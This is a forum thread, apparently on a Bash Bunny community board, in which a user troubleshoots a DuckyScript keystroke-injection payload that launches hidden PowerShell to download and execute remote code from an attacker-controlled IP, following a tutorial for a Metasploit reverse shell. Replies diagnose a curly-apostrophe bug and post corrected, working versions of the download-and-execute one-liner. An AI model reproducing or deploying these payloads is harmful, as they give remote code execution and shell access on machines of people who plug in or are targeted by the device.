rizzah Posted April 14, 2017 Share Posted April 14, 2017 Hi, im testing something with my BB and i got stuck on a duckyscript line. Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\; To my opinion this should be ok, however when executed this is what he types in: Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring( I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out? Quote Link to comment Share on other sites More sharing options...
LowValueTarget Posted April 14, 2017 Share Posted April 14, 2017 With the v1.1 firmware, you should now be able to use 'RUN WIN powershell.....". If you are not wanting to put the duckyscript in a separate file, which is generally recommended when you have more than a few lines, I would create a payload that opens notepad and types a few lines to see where you are having issues. Keep in mind that the STRING you are printing is interpreted by BASH prior to being fed to the HID device. First guess without trying anything is that you don't need to escape the single quote after 'downloadstring' Quote Link to comment Share on other sites More sharing options...
rizzah Posted April 15, 2017 Author Share Posted April 15, 2017 @LowValueTarget Thanks for your reply. I tried it with WIN RUN powershell. Results where the same. I'm trying to create the same thing as on this page: https://cyberarms.wordpress.com/2017/03/27/bash-bunny-windows-remote-shell-using-metasploit-powershell/ Everything seems to work fine, cept for the powershell line he enters in the 'run' field. i tried with or without escaping the single quote, that did not make a difference. When i remove the single quote he pastes the while line just fine. So it does seem the problem is with the single quote, question is why it doesnt get escaped properly. It did seem to work in the tutorial i pasted above and also on some online video i seen. Quote Link to comment Share on other sites More sharing options...
elkentaro Posted April 15, 2017 Share Posted April 15, 2017 (edited) I think its cause : \(\’http://192.168.145.138/ztgBcA7n\'\)\; the first one isn't a single quote but a curly apostrophe and the ending is a single quote. and there is no definition for the curly apostrophe ’ in your language.json file. Edited April 15, 2017 by elkentaro 1 Quote Link to comment Share on other sites More sharing options...
rizzah Posted May 9, 2017 Author Share Posted May 9, 2017 @elkentaro Thanks man, this was it! I guess it differs a lot which editor you use. Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 9, 2017 Share Posted May 9, 2017 On 4/14/2017 at 6:26 AM, rizzah said: Hi, im testing something with my BB and i got stuck on a duckyscript line. Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\; To my opinion this should be ok, however when executed this is what he types in: Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring( I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out? Or you can enclose you whole string command in double quotes and then you only have to escape "&"s and other double quotes you want to show up. Q STRING "powershell.exe -nop -w hidden -c \"\$H=new-object net.webclient;IEX \$H.downloadstring('http://192.168.145.138/ztgBcA7n\');\"" or shortened.... Q STRING "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\"" Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.